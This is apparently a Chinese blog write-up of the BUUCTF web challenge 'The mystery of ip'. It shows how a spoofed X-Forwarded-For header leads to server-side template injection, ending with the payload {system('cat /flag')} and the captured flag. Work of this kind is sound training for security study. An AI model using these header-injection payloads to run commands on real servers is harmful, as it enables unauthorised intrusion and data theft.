当前位置:网站首页>BUUCTF WEB [BJDCTF2020]The mystery of ip
BUUCTF WEB [BJDCTF2020]The mystery of ip
2022-04-23 12:27:00 【Y1Daa】
BUUCTF WEB [BJDCTF2020]The mystery of ip
-
在hint.php中找到一句注释
<!-- Do you know why i know your ip? --> -
在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头
X-Forwarded-For: 127.0.0.1回显为
Your IP is : 127.0.0.1说明我们获得了可控变量
-
尝试命令注入失败,到这里就没什么思路了,尝试dirsearch看能不能获得什么信息
# Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/ 200 6KB http://node4.buuoj.cn:28825/.DS_Store 301 169B http://node4.buuoj.cn:28825/css -> REDIRECTS TO: http://node4.buuoj.cn/css/ 200 2KB http://node4.buuoj.cn:28825/flag.php 200 938B http://node4.buuoj.cn:28825/header.php 301 169B http://node4.buuoj.cn:28825/img -> REDIRECTS TO: http://node4.buuoj.cn/img/ 301 169B http://node4.buuoj.cn:28825/libs -> REDIRECTS TO: http://node4.buuoj.cn/libs/ 301 169B http://node4.buuoj.cn:28825/templates_c -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/ 403 555B http://node4.buuoj.cn:28825/templates_c/发现一个名为
/template_c/的文件夹,怀疑存在模板注入 -
将X-Forwarded-For改为
X-Forwarded-For: {6*6}回显为
Your IP is : 36 -
尝试直接读取flag文件
X-Forwarded-For: {system('cat /flag')}回显
Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51412071/article/details/124344787
边栏推荐
- Idea code formatting plug-in save actions
- SynchronousQueue 源码解析
- IDEA 中 .properties文件的中文显示乱码问题的解决办法
- [wechat applet] Z-index is invalid
- Xinwangda announced that the price of battery products had been increased, and the investment of "weixiaoli" exceeded 1 billion
- Solution of asynchronous clock metastability -- multi bit signal
- QT redraw events and cuts
- 网络信息安全之零信任
- XinChaCha Trust SSL Organization Validated
- 甲辰篇 創世紀《「內元宇宙」聯載》
猜你喜欢

Number of nodes of complete binary tree

In idea Solution to the problem of garbled code in Chinese display of properties file

Idea database navigator plug-in

SQL exercise (I)

Tan Xiang, CEO of Kechuang · Pera software: the essence of zero trust is digital security. To B should also deeply study the user's mind

STM32工程移植:不同型号芯片工程之间的移植:ZE到C8

论文解读(CGC)《CGC: Contrastive Graph Clustering for Community Detection and Tracking》

IDEA 代码格式化插件Save Actions

c# 设置logo图标和快捷方式的图标

Pagoda panel command line help tutorial (including resetting password)
随机推荐
Qt重绘事件与剪切
外包干了五年,废了...
Lesson 26 static member functions of classes
Lesson 25 static member variables of classes
在 VSCode 中调试 Jest 的测试用例,VSCode调试Jest测试用例报错basedir=$(dirname “$(echo “$0“ | sed -e ‘s,\\,/,g‘)“)解决
Why is the premise of hash% length = = hash & (length-1) that length is the nth power of 2
STM32工程移植:不同型号芯片工程之间的移植:ZE到C8
智能多线弹性云增加独立的IP地址,如何实现多线功能?
How to switch PHP version in Windows 2008 system
Symmetric encryption, certificate encryption
Stm32cubeprogrammer basic instructions
Idea setting copyright information
传统企业如何应对数字化转型?这些书给你答案
第二十三课 临时对象
MySQL函数-递归函数
QT draw image
QT interprocess communication
One way ANOVA of SPSS
Stacks and queues a
同态加密技术学习